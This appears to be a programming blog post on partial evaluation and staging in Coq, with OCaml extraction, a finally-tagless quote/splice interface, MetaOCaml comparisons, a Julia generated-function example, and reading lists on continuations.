Here are some examples of other primitives we might add. The extra imports make extraction turn nat into the native Ocaml int type, which is nice. It is not made so clear in the Coq manual that you should use these libraries to get good extraction of some standard types (perhaps I missed it, or should make a pull request). You can find the full set of such things here: https://github.com/coq/coq/tree/master/theories/extraction

```
From Coq.extraction Require Import ExtrOcamlBasic ExtrOcamlNatInt.
Axiom ocaml_add : PCode nat -> PCode nat -> PCode nat.
Extract Inlined Constant ocaml_add => "(+)".
Axiom ocaml_mul : PCode nat -> PCode nat -> PCode nat.
Extract Inlined Constant ocaml_mul => "(*)".
```

If we had instead used the Coq definition of `nat` addition, it wouldn’t be protected during `vm_compute`, even if we wrapped it in `block`. It would unfold plus into its recursive definition, which is not what you want for extraction. We want to extract (+) to native ocaml (+).

You can add in other primitives as you see fit. Some things can get by merely using `block`, such as lifting literals.

Here is a very simplistic unrolling of a power function with a compile time known exponent, following Kiselyov’s lead.

```
Fixpoint pow1 (n : nat) (x : PCode nat) : PCode nat :=
match n with
| O => block 1
| S O => x
| S n' => ocaml_mul x (pow1 n' x)
end.
Definition pow2 (n : nat) : PCode (nat -> nat) := ocaml_lam (fun x => pow1 n x).
Definition compilepow : PCode (nat -> nat) := Eval native_compute in pow2 4.
Extraction compilepow.
(*
(** val compilepow : (int -> int) pCode **)
let compilepow =
(fun x -> (*) x ((*) x ((*) x x)))
*)
```

What if you want a quasiquoting interface though? Well, here is one suggestion. The same code should become either PCode or more ordinary Coq values depending on whether you decide to quote it or not. So you want overloadable syntax. This can be achieved via a typeclass.

```
(* No, I don't really know what Symantics means. Symbolic semantics? It's an Oleg-ism.
*)
Class Symantics (repr : Type -> Type) :=
{
lnat : nat -> repr nat;
lbool : bool -> repr bool;
lam : forall {a b}, (repr a -> repr b) -> repr (a -> b);
app : forall {a b}, repr (a -> b) -> repr a -> repr b;
add : repr nat -> repr nat -> repr nat;
mul : repr nat -> repr nat -> repr nat
}.
```

```
(* A simple do nothing newtype wrapper for the typeclass *)
Record R a := { unR : a }.
Arguments Build_R {a}.
Arguments unR {a}.
(* Would Definition R (a:Type) := a. be okay? *)
Instance regularsym : Symantics R :=
{|
lnat := Build_R;
lbool := Build_R;
lam := fun a b f => Build_R (fun x => unR (f (Build_R (a:= a) x)));
app := fun _ _ f x => Build_R ((unR f) (unR x));
add := fun x y => Build_R ((unR x) + (unR y));
mul := fun x y => Build_R ((unR x) * (unR y));
|}.
Instance codesym : Symantics PCode :=
{|
lnat := block;
lbool := block;
lam := fun a b => ocaml_lam (a := a) (b := b);
app := fun a b => ocaml_app (a := a) (b := b);
add := ocaml_add;
mul := ocaml_mul
|}.
```

Now we’ve overloaded the meaning of the base combinators. The type `PCode` vs `R` labels which “mode” of evaluation we’re in, “mode” being which typeclass instance we’re using. Here are two combinators for quasiquoting that were somewhat surprising to me, but so far seem to be working. `quote` takes a value of type `a` being evaluated in “`Code` mode” and makes it a value of type `Code a` being evaluated in “`R` mode”. And `splice` sort of undoes that. I would have used the MetaOcaml syntax, but using periods in the notation seemed to make Coq not happy.

```
Definition Code : Type -> Type := fun a => R (PCode a).
Definition quote {a} : PCode a -> Code a := Build_R.
Definition splice {a} : Code a -> PCode a := unR.
Declare Scope quote_scope.
Notation "<' x '>" := (quote x) : quote_scope.
Notation "<, x ,>" := (splice x) : quote_scope.
Notation "n + m" := (add n m) : quote_scope.
Notation "n * m" := (mul n m) : quote_scope.
```

Now you can take the same piece of code, add quote/splice annotations, and get a partially evaluated version. The thing doesn’t typecheck if you don’t add the appropriate annotations.

```
Open Scope quote_scope.
Fixpoint pow1' (n : nat) (x : Code nat) : Code nat :=
match n with
| O => quote (lnat 1)
| S O => x
| S n' => <' <, x ,> * <, pow1' n' x ,> '>
end.
Definition pow2' (n : nat) : Code (nat -> nat) := <' lam (fun x => <, pow1' n <' x '> ,> ) '>.
Definition compilepow' : Code (nat -> nat) := Eval native_compute in pow2' 4.
Extraction compilepow'.
(* Same as before basically.
(** val compilepow' : (int -> int) code **)
let compilepow' =
(fun x -> (*) x ((*) x ((*) x x)))
*)
```

Coolio.

With more elbow grease, is this actually workable? Do we actually save anything over explicit language modelling with data types? Are things actually hygienic and playing nice? Not sure.

We could also give notations to `lam` and the other combinators. Idiom brackets https://wiki.haskell.org/Idiom_brackets might be nice for `app`. I am a little queasy going overboard on notation. I generally speaking hate it when people do stuff like this.

Monads have something to do with partial evaluation. Moggi’s original paper on monads seems to have partial evaluation in mind.

```
(* This is moggi's let. *)
Axiom ocaml_bind : forall {a b}, PCode a -> (a -> PCode b) -> PCode b.
Extract Inlined Constant ocaml_bind => "(fun x f -> f x)".
```

Doing fix: playing nice with Coq’s fix restrictions is going to be a pain. Maybe just gas it up?

`match` statements might also suck to do in a DSL of the shown style. I suppose you’ll have to deal with everything via typeclass-dispatched recursors / pattern matchers. Maybe one notation per data type? Or mostly stick to if-then-else and booleans.

Quote and splice can also be overloaded with another typeclass such that they just interpret completely into `R`, or into an appropriate purely functionally defined Gallina monad that emulates the effects of interest. This would be helpful for verification and development purposes, as then the entire code can be reasoned about and evaluated in Coq.

Extracting arrays, mutable refs, for loops. All seems possible with some small inlined indirections that hopefully compile away. I’ve been finding godbolt.org interesting to look at to see what flambda can and can’t do.

Do I need to explicitly model a World token or an IO monad, or is the Code paradigm already sufficiently careful about order of operations and such?

Some snippets:

```
Extract Constant ref "'a" => "'a ref".
(* make_ref => "ref" *)
Axiom get_ref : forall a, ref a -> World -> a * World.
Extract Constant get_ref => "fun r _ -> (!r ,())".
Axiom set_ref : forall a, ref a -> a -> World -> unit * World.
Extract Constant set_ref => "fun r x _ -> let () = r := x in (() , ())".
Axiom Array : Type -> Type.
Extract Constant Array "'a" => "'a array".
Axiom make : forall {a : Type}, Code nat -> Code a -> Code World -> Code (Array a * World).
Extract Constant make => "fun i def _ -> ( make i def , ())".
Axiom get : forall a, Array a -> nat -> World -> a * World.
Extract Constant get => "fun r i _ -> (r.(i) ,())".
Axiom set : forall a, Array a -> nat -> a -> World -> unit * World.
Extract Constant set => "fun r i x _ -> let () = r.(i) <- x in (() , ())".
```

MetaOCaml is super cool. The quote splice way of building of the exact expressions you want feels nice and having the type system differentiate between Code and static values is very useful conceptually. It’s another instance where I feel like the types really aid the design process and clarify thinking. The types give you a compile time guarantee of what will and won’t happen.

There are other systems that do compile time stuff. Types themselves are compile time. Some languages have const types, which is pretty similar. Templates are also code generators. Macros.

Why Coq vs MetaOcaml?

- MetaOcaml doesn’t have critical mass. Its ocaml switch lags behind the mainline. Coq seems more actively developed.
- Possible verification and more powerful types (at your peril; some may not extract nicely)
- One can go beyond purely generative metaprogramming, since Ltac (and other techniques) can inspect terms.
- Typeclasses
- Can target more platforms. Haskell, Scheme, possibly C, fpgas?

However, MetaOcaml does present a much more ergonomic, consistent, well founded interface for what it does.

One needs to have some protected structure in Coq that represents a syntax tree of your intended OCaml expression. One natural choice would be a data type to represent this AST.

You also want access to the possibly impure abilities of OCaml, like mutation, errors, loops, arrays, and unbounded recursion, that don’t have direct equivalents in base Gallina. You can model the purely functional versions of these things, but you don’t per se want to extract the purely functional versions if you’re seeking the ultimate speed.

Why finally tagless style? Anything you can do finally tagless you can do in an initial style.

- Positivity restrictions make some things difficult to express in Coq data types. You can turn these restrictions off, at your peril. Raw axiomatic fixpoints and HOAS without PHOAS become easier
- Ultimately we need to build both a data type and an interpreter. Using finally tagless cuts out the middleman. Why have a whole extra set of things to write?
- Finally tagless style is open. You can add new capabilities without having to rewrite everything everywhere

Downsides

- More confusing
- Optimizations are harder
- Is the verification story shot?

I guess ultimately there might not be a great reason. I just wandered into it. I was doing Kiselyov stuff, so other Kiselyov stuff was on the brain. I could make a DSL with Quote and Splice constructors.

Typed Template Haskell gives you similar capabilities if that is more of your jam https://www.philipzucker.com/a-little-bloop-on-typed-template-haskell/

The MetaOcaml book – Kiselyov http://okmij.org/ftp/meta-programming/tutorial/index.html

http://okmij.org/ftp/tagless-final/JFP.pdf Finally Tagless, Partially Evaluated is a paper I come back to. This is both because the subject matter is interesting and seems to hold insights, and because it is quite confusing and long. I think there are entangled objectives occurring; chronologically this may be an early exposition of finally tagless style, for which it is not the most pedagogical reference.

Jason Gross, Chlipala, others? Coq partial evaluation. Once you go into plugin territory it’s a different game though. https://people.csail.mit.edu/jgross/personal-website/papers/2020-rewriting-popl-draft.pdf

Partial Evaluation book – Jones Sestoft Gomard https://www.itu.dk/people/sestoft/pebook/jonesgomardsestoft-a4.pdf

Nada Amin, Tiark Rompf. Two names to know https://scala-lms.github.io/ scala partial evaluation system https://www.youtube.com/watch?v=QuJ-cEvH_oI

Strymonas – a staged streaming library https://strymonas.github.io/

Algebraic staged parsing – https://www.cl.cam.ac.uk/~nk480/parsing.pdf

Nielson and Nielson – Two level functional languages book

https://dl.acm.org/doi/10.1145/141478.141483 – Improving binding times without explicit CPS-conversion. This bondorf paper is often cited as the why CPS helps partial evaluation paper

Modal logic. Davies and Pfenning. Was a hip topic. Their modal logic is something a bit like MetaOcaml: the “next” stage has some relationship to the Next modal operator. MetaOcaml as a proof language for intuitionistic modal logic.

Partial evaluation vs optimizing compilers. It is known that CPS tends to allow the internals of compilers to make more optimizations. The obvious optimizations performed by a compiler often correspond to simple partial evaluations. Perhaps playing around with an explicit partial evaluation system is useful to get a feeling for where GHC gets blocked.

An unrolled power in Julia, for comparison, is sketched below. I suspect it is unlikely that you want to use this technique to achieve performance goals, though. The Julia compiler itself is probably smarter than you, unless you’ve got some real secret sauce.
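Here is such an unrolled power using a generated function (a toy of my own, with hypothetical names): the exponent is a compile-time value carried in `Val`, so the multiplication chain is spliced together before the method is compiled.

```
# N is known at compile time; the body below builds the expression to compile
@generated function unrolled_pow(x, ::Val{N}) where {N}
    N == 0 && return :(one(x))
    ex = :x
    for _ in 2:N
        ex = :(x * $ex) # builds x * (x * (... * x))
    end
    return ex
end

unrolled_pow(2, Val(4)) # 16, from the unrolled body x * (x * (x * x))
```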

Continuations and partial evaluation are like jam and peanut butter.

I’ve been digging into the continuation literature a bit

William byrd call/cc tutorial https://www.youtube.com/watch?v=2GfFlfToBCo

Kenichi Asai – Delimitted continuations for everyone https://www.youtube.com/watch?v=QNM-njddhIw

- http://okmij.org/ftp/continuations/
- http://blog.sigfpe.com/2008/12/mother-of-all-monads.html
- https://gist.github.com/lexi-lambda/d97b8187a9b63619af29689e9fa1b880
- https://www.cs.utah.edu/plt/publications/icfp07-fyff.pdf

Which of the many Danvy papers is most relevant?

- Defunctionalization and refunctionalization – Defunctionalize the continuation, see Jimmy’s talk https://dl.acm.org/doi/abs/10.1145/773184.773202 and
- http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.6.2739&rep=rep1&type=pdf Continuation based partial evaluations 1995
- https://dl.acm.org/doi/pdf/10.1145/91556.91622 1990 abstracting control
- Abstract machines = Evaluators https://dl.acm.org/doi/pdf/10.1145/888251.888254 Functional correspondence 2003
- https://www.researchgate.net/profile/Olivier_Danvy/publication/226671340_The_essence_of_eta-expansion_in_partial_evaluation/links/00b7d5399ecf37a658000000/The-essence-of-eta-expansion-in-partial-evaluation.pdf Essence of Eta expansion (1995) Reference of “the trick”
- Representing control (1992) https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.46.84&rep=rep1&type=pdf Explains plotkin translation of CPS carefully. How to get other operators

Names to look out for: Dybvig, Felleisen, Oleg, Filinski, Asai, Danvy, Sabry

https://github.com/rain-1/continuations-study-group/wiki/Reading-List Great reading list

What are the most interesting Oleg sections?

CPS. Really this is converting a syntax tree of lambda calculus to one of another type. This other type can be lowered back down to lambda calculus.

Control constructs can fill in holes in the CPS translation.

Evaluation contexts. Contexts are terms with a single hole. Variables can also be used to mark holes, so therein lies some confusion.

Abstract Machines

Ben pointed out that Node is in continuation passing style

To what degree are monads and continuations related? http://hjemmesider.diku.dk/~andrzej/papers/RM-abstract.html Mother of all monads.

Certainly error handling and escape are possible with continuations.

Call-cc is as if the compiler converts to CPS, and then call-cc grabs the continuation for you.

call-cc allows you to kind of pull a program inside out. It’s weird.

Compiling to continuations book

Lisp in Small Pieces

CPSing a value: `x ~ \f -> f x`.
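As a tiny concrete version of that one-liner, here is a Julia sketch (names are mine): a CPS’d value is a function waiting for the rest of the program as its continuation `k`.

```
cps(x) = k -> k(x)            # a value becomes \k -> k x
add_cps(x, y) = k -> k(x + y) # a primitive operation in CPS style

# the "rest of the program" is passed in explicitly as the continuation:
cps(3)(x -> add_cps(x, 4)(println)) # prints 7
```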

https://homepages.inf.ed.ac.uk/wadler/papers/papers-we-love/reynolds-discoveries.pdf – The discoveries of continuations – Reynolds. Interesting bit of history about the discovery in the 60s/70s
